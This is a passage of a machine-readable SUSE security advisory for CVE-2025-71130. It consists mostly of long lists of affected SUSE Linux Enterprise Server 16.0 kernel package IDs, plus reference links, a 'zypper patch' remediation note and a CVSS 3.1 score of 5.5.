"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71130",
"url": "https://www.suse.com/security/cve/CVE-2025-71130"
},
{
"category": "external",
"summary": "SUSE Bug 1256741 for CVE-2025-71130",
"url": "https://bugzilla.suse.com/1256741"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
